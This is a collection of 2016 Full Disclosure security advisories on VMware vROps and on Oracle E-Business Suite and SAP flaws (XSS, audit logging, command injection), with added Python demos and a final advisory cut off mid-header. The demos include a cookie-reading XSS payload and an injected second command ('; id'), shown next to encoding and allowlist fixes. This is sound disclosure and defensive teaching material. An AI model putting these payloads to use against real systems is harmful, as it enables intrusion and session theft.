[FD] NEW VMSA-2016-0016 - vRealize Operations (vROps) updates address privilege escalation vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
                         VMware Security Advisory

Advisory ID: VMSA-2016-0016
Severity:    Critical
Synopsis:    vRealize Operations (vROps) updates address privilege
             escalation vulnerability
Issue date:  2016-10-11
Updated on:  2016-10-11 (Initial Advisory)
CVE number:  CVE-2016-7457
- ------------------------------------------------------------------------

1. Summary

   vRealize Operations (vROps) updates address privilege escalation
   vulnerability.

2. Relevant Products

   vRealize Operations (vROps)

3. Problem Description

   vROps privilege escalation issue

   vROps contains a privilege escalation vulnerability. Exploitation of
   this issue may allow a vROps user who has been assigned a low-privileged
   role to gain full access over the application. In addition it may be
   possible to stop and delete Virtual Machines managed by vCenter.

   VMware would like to thank Edgar Carvalho for reporting this issue to us.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the identifier CVE-2016-7457 to this issue.

   Column 5 of the following table lists the action required to remediate
   the vulnerability in each release, if a solution is available.

   VMware       Product   Running             Replace with/
   Product      Version   on       Severity   Apply Patch     Workaround
   ==========   =======   =======  ========   =============   ==========
   vRealize     6.3.0     Any      Critical   patch pending   KB2147215
   Operations

   vRealize     6.2.1     Any      Critical   patch pending   KB2147247
   Operations

   vRealize     6.2.0a    Any      Critical   patch pending   KB2147246
   Operations

   vRealize     6.1.0     Any      Critical   patch pending   KB2147248
   Operations

   vRealize     6.0.x     Any      N/A        not affected    N/A
   Operations

   vRealize     5.x       Any      N/A        not affected    N/A
   Operations

4. Solution

   Please review the patch/release notes for your product and version and
   verify the checksum of your downloaded file.

   vRealize Operations Downloads and Documentation:
   https://my.vmware.com/en/web/vmware/info/slug/infrastructure_operations_management/vmware_vrealize_operations/6_3

5. References

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7457
   https://kb.vmware.com/kb/2147215
   https://kb.vmware.com/kb/2147247
   https://kb.vmware.com/kb/2147246
   https://kb.vmware.com/kb/2147248

- ------------------------------------------------------------------------

6. Change log

   2016-10-11 VMSA-2016-0016
   Initial security advisory in conjunction with the release of vROps
   patches on 2016-10-11.

- ------------------------------------------------------------------------

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

   security-announce at lists.vmware.com
   bugtraq at securityfocus.com
   fulldisclosure at seclists.org

   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html

   VMware Lifecycle Support Phases
   https://www.vmware.com/support/policies/lifecycle.html

   Twitter
   https://twitter.com/VMwareSRC

   Copyright 2016 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFX/S0YDEcm8Vbi9kMRAhh7AJ0ctS7c+oxpaQCNvEx+SpVM5fawZACfYvPA
IhRXucua8IjVJBRr8/z45wg=
=JUi8
-----END PGP SIGNATURE-----

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site Scripting (XSS)

1. Impact on Business
=====================

By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-057
- Onapsis SVS ID: ONAPSIS-00260
- CVE: CVE-2016-0533
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information
============================

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi-0

4. Affected Components Description
==================================

Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server.

5. Vulnerability Details
========================

A remote, unauthenticated attacker could use a specific JSP file to inject arbitrary script that executes in the browsers of other users of the application. The file has one parameter that is neither validated nor output-encoded before it is written into the generated page.

6. Solution
===========

Implement the Oracle Critical Patch Update released in July 2016.

7. Report Timeline
==================

- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.

About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combines in-depth knowledge and experience to deliver technical and business context with sound security judgment to the broader information security community.

About Onapsis, Inc.
===================

Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications.

Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis' solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E&Y, KPMG and PwC.

Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis' context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications.
Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms.

For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn.

--
This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on
[FD] Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site Scripting (XSS)

1. Impact on Business
=====================

By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-056
- Onapsis SVS ID: ONAPSIS-00269, ONAPSIS-00270, ONAPSIS-00271, ONAPSIS-00272, ONAPSIS-00273, ONAPSIS-00274 and ONAPSIS-00275
- CVE: CVE-2016-3532
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information
============================

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-v

4. Affected Components Description
==================================

Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server.

5. Vulnerability Details
========================

A remote, unauthenticated attacker could use a specific JSP file to inject arbitrary script that executes in the browsers of other users of the application. The file has seven parameters that are neither validated nor output-encoded before they are written into the generated page.

6. Solution
===========

Implement the Oracle Critical Patch Update released in July 2016.

7. Report Timeline
==================

- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
[FD] Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site Scripting (XSS)

1. Impact on Business
=====================

By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-055
- Onapsis SVS ID: ONAPSIS-00277, ONAPSIS-00278 and ONAPSIS-00279
- CVE: CVE-2016-3533
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information
============================

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-iv

4. Affected Components Description
==================================

Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server.

5. Vulnerability Details
========================

A remote, unauthenticated attacker could use a specific JSP file to inject arbitrary script that executes in the browsers of other users of the application. The file has three parameters that are neither validated nor output-encoded before they are written into the generated page.

6. Solution
===========

Implement the Oracle Critical Patch Update released in July 2016.

7. Report Timeline
==================

- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
[FD] Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site Scripting (XSS)

1. Impact on Business
=====================

By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-053
- Onapsis SVS ID: ONAPSIS-00281
- CVE: CVE-2016-3535
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information
============================

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vii

4. Affected Components Description
==================================

Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server.

5. Vulnerability Details
========================

A remote, unauthenticated attacker could use a specific JSP file to inject arbitrary script that executes in the browsers of other users of the application. The file has one parameter that is neither validated nor output-encoded before it is written into the generated page.

6. Solution
===========

Implement the Oracle Critical Patch Update released in July 2016.

7. Report Timeline
==================

- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
[FD] Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site Scripting (XSS)

1. Impact on Business
=====================

By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-052
- Onapsis SVS ID: ONAPSIS-00282 and ONAPSIS-00283
- CVE: CVE-2016-3536
- Researcher: Matias Mevied
- Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

3. Vulnerability Information
============================

- Vendor: Oracle
- Affected Components: Oracle E-Business Suite 12.2
- Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: No
- Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi

4. Affected Components Description
==================================

Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server.

5. Vulnerability Details
========================

A remote, unauthenticated attacker could use a specific JSP file to inject arbitrary script that executes in the browsers of other users of the application. The file has two parameters that are neither validated nor output-encoded before they are written into the generated page.

6. Solution
===========

Implement the Oracle Critical Patch Update released in July 2016.

7. Report Timeline
==================

- 02/29/2016: Onapsis provides vulnerability information to Oracle.
- 03/01/2016: Oracle confirms reception of vulnerability report.
- 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
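The five Oracle E-Business Suite advisories above (ONAPSIS-2016-052, -053, -055, -056 and -057) all describe the same CWE-79 pattern: a JSP writes one or more request parameters into the generated page with no validation and no output encoding. The following is an added example, not code from Onapsis or Oracle, that shows the vulnerable rendering beside the encoded version and the black-box probe a tester would use to tell them apart. The parameter names (q, page), the page template and the payloads are hypothetical; the advisories do not name the JSP files or parameters involved, and they would be Java, not Python, in the real product.

```python
"""Reflected XSS (CWE-79): unencoded parameter reflection beside the fix.

Added example, not Onapsis' or Oracle's code. Parameter names, template
and payloads are constructed for the demo.
"""
import html
from urllib.parse import parse_qs, quote

PROBE = "<xss-probe>"  # constructed marker containing HTML metacharacters

# Hypothetical page with two reflected parameters. Advisory 056 reports
# seven such parameters in a single JSP; the fix must cover every one.
TEMPLATE = (
    "<html><body>"
    "<h1>Results for {q}</h1>"
    "<p>Page {page}</p>"
    "</body></html>"
)
PARAM_NAMES = ("q", "page")


def _params(query_string):
    """One value per known parameter, '' when absent (first value wins)."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    return {name: parsed.get(name, [""])[0] for name in PARAM_NAMES}


def render_vulnerable(query_string):
    """CWE-79: whatever the client sent is written into the page as markup."""
    return TEMPLATE.format(**_params(query_string))


def render_fixed(query_string):
    """Same page with HTML-context output encoding on every parameter.

    html.escape(quote=True) turns & < > " ' into entities, so a value can
    no longer close a tag or an attribute. Encoding happens at output time,
    in the context the value lands in; input validation alone is not a
    substitute for it.
    """
    safe = {k: html.escape(v, quote=True) for k, v in _params(query_string).items()}
    return TEMPLATE.format(**safe)


def reflects_unencoded(render, marker=PROBE, param="q"):
    """Black-box check: send a marker with metacharacters and report whether
    the response contains it byte-for-byte. True means the parameter is
    reflected without encoding."""
    body = render(f"{param}={quote(marker, safe='')}")
    return marker in body


if __name__ == "__main__":
    payload = '"><script>alert(document.cookie)</script>'
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(f"[{name}] reflected raw: {reflects_unencoded(render, payload)}")
        print(f"[{name}] {render('q=' + quote(payload, safe=''))}")
```

The probe is the same test a pentester runs against a real endpoint: a value with `<`, `>` and `"` in it is sent in each parameter, and the response is searched for the verbatim string. Against the vulnerable renderer it comes back intact; against the fixed one only the entity-encoded form appears. Checking every parameter, not just the one first reported, is what turns a single finding into the seven-parameter case of advisory 056.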
[FD] Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption
Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption

1. Impact on Business
=====================

By exploiting this vulnerability an attacker could hide audit information logged by the SAP system.

Risk Level: Low

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-051
- Onapsis SVS ID: ONAPSIS-00247
- CVE: CVE-2016-7437
- Researcher: Emiliano J. Fausto
- Vendor Provided CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)
- Onapsis CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N)

3. Vulnerability Information
============================

- Vendor: SAP AG
- Affected Components: SAP NETWEAVER 7.40
- Vulnerability Class: Insufficient Logging (CWE-778)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: Yes
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0

4. Affected Components Description
==================================

The SAP Security Audit Log is used to record security-related system information such as changes to user master records or unsuccessful logon attempts. This log is a tool designed for auditors who need to take a detailed look at what occurs in the SAP System. By activating the audit log, you keep a record of those activities that you specify for your audit. You can then access this information for evaluation in the form of an audit analysis report.

5. Vulnerability Details
========================

Even when the profile parameter rfc/callback_security_method is configured and the SAP Security Audit Log is set to record RFC callback events (accepted and rejected), both events, DUI and DUJ, are written to the Security Audit Log with the criticality Non-critical. Because the criticality the log reports to the security analyst is inaccurate, filtering out non-critical events also discards the rejected attempts to execute RFC function callbacks.

6. Solution
===========

Implement SAP Security Note 2252312.

7. Report Timeline
==================

- 11/24/2015: Onapsis provides vulnerability information to SAP AG.
- 01/09/2016: SAP releases SAP Security Note 2252312 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
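The practical consequence of ONAPSIS-2016-051 is for whoever reviews the Security Audit Log: a review that keeps only events SAP marked Critical never sees a rejected RFC callback. The following added example, not code from Onapsis or SAP, runs both review strategies over constructed sample lines and shows which events the criticality filter drops. The pipe-separated line layout is invented for the demo and is not SAP's audit-file format; the DUI=accepted / DUJ=rejected mapping, the AU1/AU2 logon events and the user, destination and function names are assumptions.

```python
"""Security Audit Log review: criticality filter vs. message-ID filter.

Added example, not Onapsis' or SAP's code. SAMPLE_LOG is constructed and
its layout (timestamp|message id|criticality|user|text) is not SAP's real
audit-file format. DUI=accepted / DUJ=rejected and the other event IDs are
assumptions for the demo.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditEvent:
    timestamp: str
    message_id: str
    criticality: str  # "Critical" or "Non-critical"
    user: str
    text: str


# Constructed sample. Both callback events carry "Non-critical", which is
# the behaviour the advisory reports for an unpatched system.
SAMPLE_LOG = """\
2016-01-12 10:01:03|AU2|Critical|ADMIN|Logon failed (reason=1, type=dialog)
2016-01-12 10:02:17|DUI|Non-critical|BATCH|RFC callback accepted dest=PRD_RFC func=RFC_PING
2016-01-12 10:02:18|DUJ|Non-critical|BATCH|RFC callback rejected dest=UNKNOWN_DEST func=SXPG_COMMAND_EXECUTE
2016-01-12 10:03:00|AU1|Non-critical|JDOE|Logon successful (type=dialog)
2016-01-12 10:04:41|DUJ|Non-critical|RFC_SVC|RFC callback rejected dest=UNKNOWN_DEST func=RFC_READ_TABLE
"""

# Message IDs that mean "an RFC callback was rejected" (assumption: DUJ).
REJECTED_CALLBACK_IDS = frozenset({"DUJ"})


def parse_log(text):
    """Parse the constructed line layout into AuditEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, message_id, criticality, user, msg = line.split("|", 4)
        events.append(AuditEvent(ts, message_id, criticality, user, msg))
    return events


def critical_only(events):
    """The review the advisory warns about: keep only what SAP marked Critical."""
    return [e for e in events if e.criticality == "Critical"]


def rejected_callbacks(events, ids=REJECTED_CALLBACK_IDS):
    """Select by message ID, ignoring the criticality SAP assigned."""
    return [e for e in events if e.message_id in ids]


def missed_by_criticality_filter(events):
    """Rejected callbacks that a criticality-based review never surfaces."""
    seen = set(critical_only(events))
    return [e for e in rejected_callbacks(events) if e not in seen]


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print(f"{len(evts)} events, {len(critical_only(evts))} shown by criticality filter")
    for e in missed_by_criticality_filter(evts):
        print("MISSED:", e.timestamp, e.message_id, e.user, e.text)
```

Until SAP Security Note 2252312 is applied, selecting on the message ID (DUJ here) rather than on criticality is the only way a log review catches rejected callbacks; the same selection is what a SIEM rule should key on, since the criticality field cannot be trusted for these events.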
[FD] Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption
Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption

1. Impact on Business
=====================

By exploiting this vulnerability, an attacker could potentially abuse technical functions to access and/or compromise business information.

Risk Level: Low

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-005
- Onapsis SVS ID: ONAPSIS-00161
- CVE: CVE-2016-3638
- Researcher: Nahuel D. Sanchez
- Vendor Provided CVSS v2: 1.5 (AV:L/AC:M/Au:S/C:N/I:N/A:P)
- Onapsis CVSS v2: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P)

3. Vulnerability Information
============================

- Vendor: SAP AG
- Affected Components: SLD Registration Program
- Vulnerability Class: Buffer errors (CWE-119)
- Remotely Exploitable: No
- Locally Exploitable: Yes
- Authentication Required: No
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-sldreg-memory-corruption

4. Affected Components Description
==================================

The SLDREG tool is used to register SAP systems in the System Landscape Directory (SLD). The SLD of SAP NetWeaver serves as the central information repository for the system landscape.

5. Vulnerability Details
========================

The SLDREG binary is prone to a memory corruption vulnerability when specially crafted input is passed as the HOST parameter.

6. Solution
===========

Implement SAP Security Note 2125623.

7. Report Timeline
==================

- 01/30/2015: Onapsis provides vulnerability information to SAP AG.
- 02/02/2015: SAP AG confirms reception of vulnerability report.
- 03/10/2015: SAP reports that the vulnerability is not a security issue.
- 04/14/2015: SAP reports fix is In Process.
- 05/12/2015: SAP reports fix is In Process.
- 06/09/2015: SAP reports fix is In Process.
- 07/14/2015: SAP reports fix is In Process.
- 08/11/2015: SAP releases SAP Security Note 2125623 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
[FD] Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in SCTC_REFRESH_CONFIG_CTC
Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in SCTC_REFRESH_CONFIG_CTC

1. Impact on Business
=====================

By exploiting this vulnerability, an authenticated user is able to take full control of the system.

Risk Level: Critical

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-050
- Onapsis SVS ID: ONAPSIS-00252
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

3. Vulnerability Information
============================

- Vendor: SAP AG
- Affected Components: SAP NetWeaver 7.40 SP 12
- Vulnerability Class: Improper Neutralization of Special Elements used in an OS Command (CWE-78)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshconfigctc

4. Affected Components Description
==================================

SAP NetWeaver is SAP's technological integration platform, on top of which enterprise and business solutions are developed and run. SCTC is a subpackage of SAP_BASIS that holds technical configuration functions.

5. Vulnerability Details
========================

The function SCTC_REFRESH_CONFIG_CTC does not correctly sanitize the variables it passes to a CALL 'SYSTEM' statement. An attacker who holds the privileges needed to invoke the function can therefore execute arbitrary OS commands.

6. Solution
===========

Implement SAP Security Note 2260344.

7. Report Timeline
==================

- 11/26/2015: Onapsis provides vulnerability information to SAP AG.
- 11/27/2015: SAP AG confirms reception of vulnerability report.
- 01/12/2016: SAP reports fix is In Process.
- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
[FD] Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in SCTC_REORG_SPOOL
Onapsis Security Advisory ONAPSIS-2016-049: SAP OS Command Injection in SCTC_REORG_SPOOL

1. Impact on Business
=====================

By exploiting this vulnerability, an authenticated user is able to take full control of the system.

Risk Level: Critical

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-049
- Onapsis SVS ID: ONAPSIS-00255
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

3. Vulnerability Information
============================

- Vendor: SAP AG
- Affected Components: SAP NetWeaver 7.40 SP 12
- Vulnerability Class: Improper Neutralization of Special Elements used in an OS Command (CWE-78)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcreorgspool

4. Affected Components Description
==================================

SAP NetWeaver is SAP's technological integration platform, on top of which enterprise and business solutions are developed and run. SCTC is a subpackage of SAP_BASIS that holds technical configuration functions.

5. Vulnerability Details
========================

The function SCTC_REORG_SPOOL does not correctly sanitize the variables it passes to a CALL 'SYSTEM' statement. An attacker who holds the privileges needed to invoke the function can therefore execute arbitrary OS commands.

6. Solution
===========

Implement SAP Security Note 2260344.

7. Report Timeline
==================

- 11/26/2015: Onapsis provides vulnerability information to SAP AG.
- 11/27/2015: SAP AG confirms reception of vulnerability report.
- 01/12/2016: SAP reports fix is In Process.
- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
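Both SCTC advisories (ONAPSIS-2016-050 and ONAPSIS-2016-049) describe the same defect class: caller-controlled text is spliced into the string that CALL 'SYSTEM' hands to the OS shell. The following Python model is an added illustration, not SAP or Onapsis code, and the logical-command table, the argument pattern and the sample input are invented for it. It puts the string-assembly pattern beside a hardened version that resolves a logical command name through an allowlist, validates each argument, and executes an argv list so that no shell ever parses attacker text.

```python
"""Vulnerable vs. hardened OS command assembly (added model of CWE-78 as
described in the two SCTC advisories; not SAP's own code)."""
import re
import shlex
import subprocess


# --- Vulnerable pattern: user-controlled text concatenated into one shell
# string, the ABAP equivalent being CONCATENATE ... INTO lv_cmd followed by
# CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd.
def build_shell_command(directory):
    return "ls -l " + directory


def shell_commands(cmdline):
    """Split a shell string into the separate commands a POSIX shell would
    run, so an injected ';', '|', '&&' or '&' becomes visible as a second
    command rather than an argument."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in (";", "|", "&&", "||", "&"):
            commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# --- Hardened pattern: the caller names a logical command, never a program;
# arguments are checked against a strict pattern; execution uses argv.
LOGICAL_COMMANDS = {            # constructed allowlist for this example
    "LIST_DIR": ["ls", "-l"],
    "DISK_FREE": ["df", "-h"],
}
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./-]{1,128}$")


def build_argv(logical_name, *args):
    if logical_name not in LOGICAL_COMMANDS:
        raise PermissionError("unknown logical command %r" % logical_name)
    for arg in args:
        # Reject shell metacharacters, whitespace, option injection ("-rf")
        # and path traversal before the value gets anywhere near execution.
        if (not SAFE_ARG.match(arg) or arg.startswith("-")
                or ".." in arg.split("/")):
            raise ValueError("rejected argument %r" % arg)
    return LOGICAL_COMMANDS[logical_name] + list(args)


def run_argv(argv):
    """argv form: the kernel receives the list as-is, so ';' in an argument
    is just a byte in that argument."""
    return subprocess.run(argv, capture_output=True).returncode


if __name__ == "__main__":
    tainted = "/usr/sap/trans; id"          # constructed attacker input
    print(shell_commands(build_shell_command(tainted)))   # two commands
    try:
        build_argv("LIST_DIR", tainted)
    except ValueError as err:
        print("hardened path:", err)
    print(build_argv("LIST_DIR", "/usr/sap/trans"))
```

The `shell_commands` helper only tokenizes; it exists to make the injected command boundary visible without running anything. `run_argv` is what a hardened caller would actually invoke.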
[FD] Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass
Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass

1. Impact on Business
=====================

By exploiting this vulnerability, an attacker could bypass protections implemented in SAP systems, potentially executing arbitrary business processes.

Risk Level: Medium

2. Advisory Information
=======================

- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-002
- Onapsis SVS ID: ONAPSIS-00165
